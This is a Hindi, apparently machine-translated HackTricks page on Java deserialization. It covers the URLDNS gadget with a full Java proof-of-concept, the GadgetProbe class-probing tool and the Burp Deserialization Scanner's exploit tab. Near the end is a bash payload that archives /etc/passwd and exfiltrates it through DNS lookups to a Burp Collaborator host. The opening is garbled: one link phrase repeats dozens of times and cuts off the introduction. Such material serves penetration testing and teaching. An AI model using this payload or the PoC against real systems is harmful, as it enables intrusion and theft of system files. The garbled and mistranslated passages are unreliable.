hacktricks/pentesting-web/deserialization/java-dns-deserialization-and-gadgetprobe.md

# जावा DNS डिसीरियलाइज़ेशन, गैजेटप्रोब और जावा डिसीरियलाइज़ेशन स्कैनर

## जावा DNS डिसीरियलाइज़ेशन, गैजेटप्रोब और जावा डिसीरियलाइज़ेशन स्कैनर

<details>

<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>

* क्या आप किसी **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी **कंपनी को HackTricks में विज्ञापित** देखना चाहते हैं? या क्या आपको **PEASS के नवीनतम संस्करण या HackTricks को PDF में डाउनलोड करने का उपयोग** करने की आवश्यकता है? [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जांच करें!
* खोजें [**The PEASS Family**](https://opensea.io/collection/the-peass-family), हमारा विशेष [**NFT**](https://opensea.io/collection/the-peass-family) संग्रह
* प्राप्त करें [**आधिकारिक PEASS और HackTricks swag**](https://peass.creator-spring.com)
* **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या मुझे **ट्विटर** पर **फ़ॉलो** करें [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **अपने हैकिंग ट्रिक्स साझा करें और PR जमा करके** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **और** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud) **को** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud) **को** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud) **को** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud) **को** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud) **को** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud) **को** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud) **को** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud) **को** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud) **को** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud) **को** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud) **को** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud) **को** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud) **को** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud) **को** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud) **को** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud) **को** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud) **को** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud) **को** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud) **को** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud) **को** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud) **को** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud) **को** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud) **को** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud) **को** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud) **को** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud) **को** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud) **को** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud) **को** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud) **को** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud) **को** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud) **को** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud) **को** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud) **को** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud) **को** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud) **को** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud) **को** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud) **को** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud) **को** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud) **को** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud) **को** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud) **को** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud) **को** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud) **को** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud) **को** [**hacktricks-cloud repo**](
```java
public final class URL implements java.io.Serializable {
```
इस कक्षा में एक **अजीब व्यवहार होता है।** दस्तावेज़ीकरण से: "**दो होस्ट बराबर माने जाते हैं अगर दोनों होस्ट नामों को एक ही आईपी पते में रेज़ोल्व किया जा सकता है**"।\
फिर, हर बार जब भी एक URL ऑब्जेक्ट **किसी भी** **फंक्शन `equals`** या **`hashCode`** को कॉल करता है, एक **DNS अनुरोध** आईपी पता प्राप्त करने के लिए **भेजा जाएगा**।

**URL** ऑब्जेक्ट से **`hashCode`** फंक्शन को कॉल करना बहुत आसान है, इसके लिए इस ऑब्जेक्ट को एक `HashMap` में डालना पर्याप्त है जो डिसीरियलाइज़ किया जाएगा। इसलिए, `HashMap` के **`readObject`** फंक्शन के अंत में यह कोड चलाया जाता है:
```java
private void readObject(java.io.ObjectInputStream s)
throws IOException, ClassNotFoundException {
[   ...   ]
for (int i = 0; i < mappings; i++) {
[   ...   ]
putVal(hash(key), key, value, false, false);
}
```
यह **चल रहा है** `HashMap` के भीतर हर मान के साथ `putVal` को **चलाएगा**। लेकिन, अधिक महत्वपूर्ण है `hash` को हर मान के साथ बुलाना। यह `hash` फ़ंक्शन का कोड है:
```java
static final int hash(Object key) {
int h;
return (key == null) ? 0 : (h = key.hashCode()) ^ (h >>> 16);
}
```
जैसा कि आप देख सकते हैं, **डीसीरियलाइज़ करते समय** एक **`HashMap`** को **डीसीरियलाइज़ किया जाता है** तो `hash` फ़ंक्शन हर ऑब्जेक्ट के साथ **चलाया जाएगा** और **`hash`** के निष्पादन के दौरान **ऑब्जेक्ट का `.hashCode()` निष्पादित होगा**। इसलिए, यदि आप एक **URL ऑब्जेक्ट** को सम्मिलित करने वाले **`HashMap`** को **डीसीरियलाइज़ करते हैं**, तो **URL ऑब्जेक्ट** `.hashCode()` को **निष्पादित करेगा**।

अब, हम `URLObject.hashCode()` के कोड की ओर देखते हैं:
```java
public synchronized int hashCode() {
if (hashCode != -1)
return hashCode;

hashCode = handler.hashCode(this);
return hashCode;
```
जैसा कि आप देख सकते हैं, जब एक `URLObject` `.hashCode()` को निष्पादित करता है, तो इसे `hashCode(this)` कहा जाता है। एक जारी रखने के लिए आप इस फ़ंक्शन के कोड को देख सकते हैं:
```java
protected int hashCode(URL u) {
int h = 0;

// Generate the protocol part.
String protocol = u.getProtocol();
if (protocol != null)
h += protocol.hashCode();

// Generate the host part.
InetAddress addr = getHostAddress(u);
[   ...   ]
```
आप देख सकते हैं कि एक `getHostAddress` डोमेन के लिए निष्पादित किया जाता है, **एक DNS क्वेरी लॉन्च करने** के लिए।

इसलिए, इस क्लास का दुरुपयोग किया जा सकता है ताकि यह दिखा सके कि **डेसीरियलाइज़ेशन** संभव है, या यहां तक कि जानकारी को **बाहर निकाला जा सके** (आप एक कमांड निष्पादन के आउटपुट को सबडोमेन के रूप में जोड़ सकते हैं)।

### URLDNS पेलोड कोड उदाहरण

आप [यसोसीरियल से URLDNS पेलोड कोड यहां](https://github.com/frohoff/ysoserial/blob/master/src/main/java/ysoserial/payloads/URLDNS.java) पा सकते हैं। हालांकि, इसे कोड करने को समझने को सरल बनाने के लिए मैंने अपना खुद का PoC बनाया है (यसोसीरियल के आधार पर):
```java
import java.io.File;
import java.io.FileInputStream;
import java.io.FileOutputStream;
import java.io.IOException;
import java.io.ObjectInputStream;
import java.io.ObjectOutputStream;
import java.lang.reflect.Field;
import java.net.InetAddress;
import java.net.URLConnection;
import java.net.URLStreamHandler;
import java.util.HashMap;
import java.net.URL;

public class URLDNS {
public static void GeneratePayload(Object instance, String file)
throws Exception {
//Serialize the constructed payload and write it to the file
File f = new File(file);
ObjectOutputStream out = new ObjectOutputStream(new FileOutputStream(f));
out.writeObject(instance);
out.flush();
out.close();
}
public static void payloadTest(String file) throws Exception {
//Read the written payload and deserialize it
ObjectInputStream in = new ObjectInputStream(new FileInputStream(file));
Object obj = in.readObject();
System.out.println(obj);
in.close();
}

public static void main(final String[] args) throws Exception {
String url = "http://3tx71wjbze3ihjqej2tjw7284zapye.burpcollaborator.net";
HashMap ht = new HashMap(); // HashMap that will contain the URL
URLStreamHandler handler = new SilentURLStreamHandler();
URL u = new URL(null, url, handler); // URL to use as the Key
ht.put(u, url); //The value can be anything that is Serializable, URL as the key is what triggers the DNS lookup.

// During the put above, the URL's hashCode is calculated and cached.
// This resets that so the next time hashCode is called a DNS lookup will be triggered.
final Field field = u.getClass().getDeclaredField("hashCode");
field.setAccessible(true);
field.set(u, -1);

//Test the payloads
GeneratePayload(ht, "C:\\Users\\Public\\payload.serial");
}
}


class SilentURLStreamHandler extends URLStreamHandler {

protected URLConnection openConnection(URL u) throws IOException {
return null;
}

protected synchronized InetAddress getHostAddress(URL u) {
return null;
}
}
```
### अधिक जानकारी

* [https://blog.paranoidsoftware.com/triggering-a-dns-lookup-using-java-deserialization/](https://blog.paranoidsoftware.com/triggering-a-dns-lookup-using-java-deserialization/)
* मूल विचार में थी कि थी कि जीमेल कलेक्शन्स पेलोड को डीएनएस क्वेरी करने के लिए बदल दिया गया था, यह प्रस्तावित तरीके से कम सुरक्षित था, लेकिन यह पोस्ट है: [https://www.gosecure.net/blog/2017/03/22/detecting-deserialization-bugs-with-dns-exfiltration/](https://www.gosecure.net/blog/2017/03/22/detecting-deserialization-bugs-with-dns-exfiltration/)

## GadgetProbe

आप [**GadgetProbe**](https://github.com/BishopFox/GadgetProbe) को बर्प स्यूट ऐप स्टोर (एक्सटेंडर) से डाउनलोड कर सकते हैं।

**GadgetProbe** यह जांचने की कोशिश करेगा कि क्या कुछ **जावा कक्षाएं** सर्वर की जावा कक्षा पर मौजूद हैं, ताकि आप जान सकें कि क्या यह किसी ज्ञात शोषण के लिए **विकल्पशील** है।

### यह कैसे काम करता है

**GadgetProbe** पिछले खंड के **डीएनएस पेलोड** का उपयोग करेगा, लेकिन **डीएनएस क्वेरी** चलाने से **पहले** यह एक **अनिश्चित कक्षा को डिसीरियलाइज़** करने की कोशिश करेगा। यदि **अनिश्चित कक्षा मौजूद है**, तो **डीएनएस क्वेरी** भेजी जाएगी और GadgetProbe यह नोट करेगा कि यह कक्षा मौजूद है। यदि **डीएनएस** अनुरोध कभी नहीं भेजा जाता है, तो इसका अर्थ है कि **अनिश्चित कक्षा सफलतापूर्वक डिसीरियलाइज़ नहीं हुई** है, इसलिए या तो यह मौजूद नहीं है या यह **सीरीयलाइज़ नहीं हो सकती/शोषणीय** है।

गिथब के अंदर, [**GadgetProbe के पास कुछ शब्द सूचियाँ हैं**](https://github.com/BishopFox/GadgetProbe/tree/master/wordlists) जिन्हें जावा कक्षाओं के लिए परीक्षण के लिए उपयोग किया जा सकता है।

![](<../../.gitbook/assets/intruder4 (1) (1) (1).gif>)

### अधिक जानकारी

* [https://know.bishopfox.com/research/gadgetprobe](https://know.bishopfox.com/research/gadgetprobe)

## जावा डिसीरियलाइज़ेशन स्कैनर

यह स्कैनर बर्प ऐप स्टोर (एक्सटेंडर) से **डाउनलोड** किया जा सकता है।\
इस **एक्सटेंशन** में **पैसिव** और सक्रिय **क्षमताएं** होती हैं।

### पैसिव

डिफ़ॉल्ट रूप से यह सभी अनुरोधों और प्रतिक्रियाओं की जांच करता है कि क्या वे **जावा सीरीयलाइज़ के जादू बाइट्स** को ढूंढ़ रहे हैं और यदि कोई भी पाया जाता है तो एक सुरक्षा चेतावनी प्रदर्शित करेगा:

![](<../../.gitbook/assets/image (290).png>)

### सक्रिय

**मैन्युअल परीक्षण**

आप एक अनुरोध का चयन कर सकते हैं, उस पर दायां क्लिक करें और `Send request to DS - Manual Testing` करें।\
फिर, _डिसीरियलाइज़ेशन स्कैनर टैब_ --> _मैन्युअल परीक्षण टैब_ के अंदर आप **इंजेक्शन प्वाइंट** का चयन कर सकते हैं। और **परीक्षण शुरू** कर सकते हैं (उपयुक्त एटैक का चयन करें जो इस्तेमाल की गई कोडिंग पर निर्भर करता है)।

![](../../.gitbook/assets/3-1.png)

यह "मैन्युअल परीक्षण" कहा जाता है, लेकिन यह काफी **स्वचालित** है। यह स्वचालित रूप से जांचेगा कि क्या **डिसीरियलाइज़ेशन** किसी भी **ysoserial पेलोड** के लिए **विकल्पशील** है, वेब सर्वर पर मौजूद पुस्तकालयों की जांच करेगा और विकल्पशील वालों को हाइलाइट करेगा। **विकल्पशील पुस्तकालयों** की **जांच** करने के लिए आप जावा की **नींदें**, **सीप** द्वारा **सीप** और पहले से ही उल्लिखित करने के लिए **डीएनएस** का उपयोग करने का चयन कर सकते हैं।

**शोषण**

एक विकल्पशील पुस्तकालय को पहचानने के बाद आप अनुरोध को _शोषण टैब_ में भेज सकते हैं।\
इस टैब में आपको फिर से **इंजेक्शन प्वाइंट** का चयन करना होगा, एक **विकल्पशील पुस्तकालय** और **कमांड** लिखना होगा। फिर, उचित **अटैक** बटन दबाएं।

![](<../../.gitbook/assets/4 (1).png>)

### जावा डिसीरियलाइज़ेशन DNS Exfil जानकारी

अपने पेलोड को निम्नलिखित के तरह कुछ ऐसा कराएं:
```bash
(i=0;tar zcf - /etc/passwd | xxd -p -c 31 | while read line; do host $line.$i.cl1k22spvdzcxdenxt5onx5id9je73.burpcollaborator.net;i=$((i+1)); done)
```
### अधिक जानकारी

* [https://techblog.mediaservice.net/2017/05/reliable-discovery-and-exploitation-of-java-deserialization-vulnerabilities/](https://techblog.mediaservice.net/2017/05/reliable-discovery-and-exploitation-of-java-deserialization-vulnerabilities/)

<details>

<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>

* क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी **कंपनी को HackTricks में विज्ञापित** देखना चाहते हैं? या क्या आपको **PEASS के नवीनतम संस्करण या HackTricks को PDF में डाउनलोड करने का उपयोग** करने की इच्छा है? [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जांच करें!
* खोजें [**The PEASS Family**](https://opensea.io/collection/the-peass-family), हमारा विशेष [**NFT संग्रह**](https://opensea.io/collection/the-peass-family)
* प्राप्त करें [**आधिकारिक PEASS & HackTricks swag**](https://peass.creator-spring.com)
* **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या मुझे **Twitter** पर **फ़ॉलो** करें [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **अपने हैकिंग ट्रिक्स साझा करें और PRs सबमिट करें** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **और** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud) **को।**

</details>